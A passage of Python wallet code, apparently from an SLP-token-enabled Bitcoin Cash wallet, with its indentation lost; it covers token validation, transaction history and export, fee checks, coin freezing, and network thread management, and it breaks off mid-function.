def revalidate(self, tx_hash, tx):
tti = self.tx_tokinfo[tx_hash]
tti['validity'] = 0
self.slp_check_validation(tx_hash, tx)
slp_gs_mgr.slp_validity_signal.emit(tx_hash, tti['validity'])
def slp_check_validation(self, tx_hash, tx):
""" Callers are expected to take lock(s). We take no locks """
tti = self.tx_tokinfo[tx_hash]
try:
is_new = self.token_types[tti['token_id']]['decimals'] == '?'
except:
is_new = False
if tti['validity'] == 0 and tti['token_id'] in self.token_types and not is_new and tti['type'] in ['SLP1','SLP65','SLP129']:
def callback(job):
(txid,node), = job.nodes.items()
val = node.validity
tti['validity'] = val
if slp_gs_mgr.slp_validity_signal is not None:
slp_gs_mgr.slp_validity_signal.emit(txid, val)
if slp_gs_mgr.slpdb_validation_enabled:
try:
result = slp_slpdb_validator.check_validity(tx_hash)
if result >= slp_gs_mgr.slpdb_confirmations:
tti['validity'] = 1
return
else:
tti['validity'] = 2
return
except Exception as e:
raise Exception(f"Exception: {str(e)}")
if tti['type'] in ['SLP1']:
job = self.slp_graph_0x01.make_job(tx, self, self.network,
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
elif tti['type'] in ['SLP65', 'SLP129']:
job = self.slp_graph_0x01_nft.make_job(tx, self, self.network, nft_type=tti['type'],
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
if job is not None:
job.add_callback(callback)
# This was commented out because it spammed the log so badly
# it impacted performance. SLP validation can create a *lot* of jobs!
#finalization_print_error(job, f"[{self.basename()}] Job for {tx_hash} type {tti['type']} finalized")
def rebuild_slp(self,):
"""Wipe away old SLP transaction data and rerun on the entire tx set.
"""
with self.lock:
self._slp_txo = defaultdict(lambda: defaultdict(dict))
self.tx_tokinfo = {}
for txid, tx in self.transactions.items():
self.handleSlpTransaction(txid, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
self.txi.pop(tx_hash, None)
self.txo.pop(tx_hash, None)
self.tx_fees.pop(tx_hash, None)
self.tx_tokinfo[tx_hash] = {}
for addr, addrdict in self._slp_txo.items():
if tx_hash in addrdict: addrdict[tx_hash] = {}
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def get_slp_history(self, domain=None, validities_considered=(None,0,1)):
history = []
histories = self.get_slp_histories(domain=domain, validities_considered=validities_considered)
# Take separate token histories and flatten them, then sort them.
for token_id,t_history in histories.items():
for tx_hash, height, conf, timestamp, delta in t_history:
history.append((tx_hash, height, conf, timestamp, delta, token_id))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
return history
def get_slp_histories(self, domain=None, validities_considered=(0,1)):
# Based on get_history.
# We return a dict of histories, one history per token_id.
# get domain
if domain is None:
domain = self.get_addresses()
#1. Big iteration to find all deltas and put them in the right place.
token_tx_deltas = defaultdict(lambda: defaultdict(int)) # defaultdict of defaultdicts of ints :)
for addr in domain:
h = self.get_address_history(addr)
with self.lock:
addrslptxo = self._slp_txo[addr]
for tx_hash, height in h:
if tx_hash in self.pruned_txo.values():
continue
tti = self.tx_tokinfo.get(tx_hash)
if tti and tti['validity'] in validities_considered:
txdict = addrslptxo.get(tx_hash,{})
for idx,d in txdict.items():
if isinstance(d['qty'],int):
token_tx_deltas[d['token_id']][tx_hash] += d['qty'] # received!
# scan over all txi's, trying to find if they were tokens, which tokens, and how much
# (note that non-SLP txes can spend (burn) SLP --- and SLP of tokenA can burn tokenB)
for n, _ in self.txi.get(tx_hash, {}).get(addr, ()):
prevtxid, prevout_str = n.rsplit(':',1)
tti = self.tx_tokinfo.get(prevtxid)
if not (tti and tti['validity'] in validities_considered):
continue
prevout = int(prevout_str)
d = addrslptxo.get(prevtxid,{}).get(prevout,{})
if isinstance(d.get('qty',None),int):
token_tx_deltas[d['token_id']][tx_hash] -= d['qty'] # received!
# 2. create history (no sorting needed since balances won't be computed)
histories = {}
for token_id, tx_deltas in token_tx_deltas.items():
history = histories[token_id] = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
# 3. At this point we could compute running balances, but let's not.
return histories
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab bch history
h = self.get_history(domain, reverse=True)
out = []
# grab slp history
_slp_h = self.get_slp_history(domain=domain, validities_considered=(None,0,1,2,3,4))
def fmt_slp_amt(v, decimals):
if v is None:
return '--'
if decimals == "?":
decimals = 0
return format_satoshis(v, decimal_point=int(decimals), is_diff=True)
def get_token_info(token_id):
return self.token_types.get(token_id, {
'class': '?',
'decimals': 0,
'name': 'unknown'
})
slp_h = dict((tx_hash, { \
'value': fmt_slp_amt(delta, get_token_info(token_id)['decimals']), \
'token_id': token_id, \
'name': get_token_info(token_id)['name'] \
}) for tx_hash, _, _, _, delta, token_id in _slp_h)
def get_slp_tx(tx_hash):
if slp_h.get(tx_hash) is None:
return { 'value': '--', 'name': '--', 'token_id': '--' }
return slp_h.get(tx_hash)
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
slp_info = get_slp_tx(tx_hash)
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
'slp_value' : slp_info['value'],
'slp_name' : slp_info['name'],
'slp_token_id' : slp_info['token_id']
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def check_sufficient_slp_balance(self, slpMessage, config):
if self.is_slp:
if slpMessage.transaction_type == 'SEND':
total_token_out = sum(slpMessage.op_return_fields['token_output'])
valid_token_balance, _, _, valid_unfrozen_token_balance, _ = self.get_slp_token_balance(slpMessage.op_return_fields['token_id_hex'], config)
if total_token_out > valid_token_balance:
raise NotEnoughFundsSlp()
elif total_token_out > valid_unfrozen_token_balance:
raise NotEnoughUnfrozenFundsSlp()
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None, *, mandatory_coins=[]):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
for item in mandatory_coins:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [self.get_addresses()[0]]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr,
mandatory_coins=mandatory_coins)
else:
inputs = mandatory_coins + inputs
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
return
# Sort the inputs and outputs deterministically
if not mandatory_coins:
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def make_unsigned_transaction_for_bitcoinfiles(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info_for_bitcoinfiles(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [inputs[0]['address']]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
# determine if this transaction should utilize all available inputs
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
return
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check here for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def _slp_callback_on_status(self, event, *args):
if self.is_slp and args[0] == 'connected':
self.activate_slp()
def start_threads(self, network):
self.network = network
if self.network:
if self.is_slp:
# Note: it's important that SLP data structures are defined
# before the network (SPV/Synchronizer) callbacks are installed
# otherwise we may receive a tx from the network thread
# before SLP objects are properly constructed.
self.slp_graph_0x01 = slp_validator_0x01.shared_context
self.slp_graph_0x01_nft = slp_validator_0x01_nft1.shared_context_nft1
self.activate_slp()
self.network.register_callback(self._slp_callback_on_status, ['status'])
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
if self.is_slp:
# NB: it's important this be done here after network
# callbacks are torn down in the above lines.
self.network.unregister_callback(self._slp_callback_on_status)
jobs_stopped = self.slp_graph_0x01.stop_all_for_wallet(self, timeout=2.0)
self.print_error("Stopped", len(jobs_stopped), "slp_0x01 jobs")
#jobs_stopped = self.slp_graph_0x01_nft.stop_all_for_wallet(self)
#self.print_error("Stopped", len(jobs_stopped), "slp_0x01_nft jobs")
self.slp_graph_0x01_nft.kill()
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def add_input_info_for_bitcoinfiles(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
if not x_pubkey[0:2] in ['02', '03', '04']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
else:
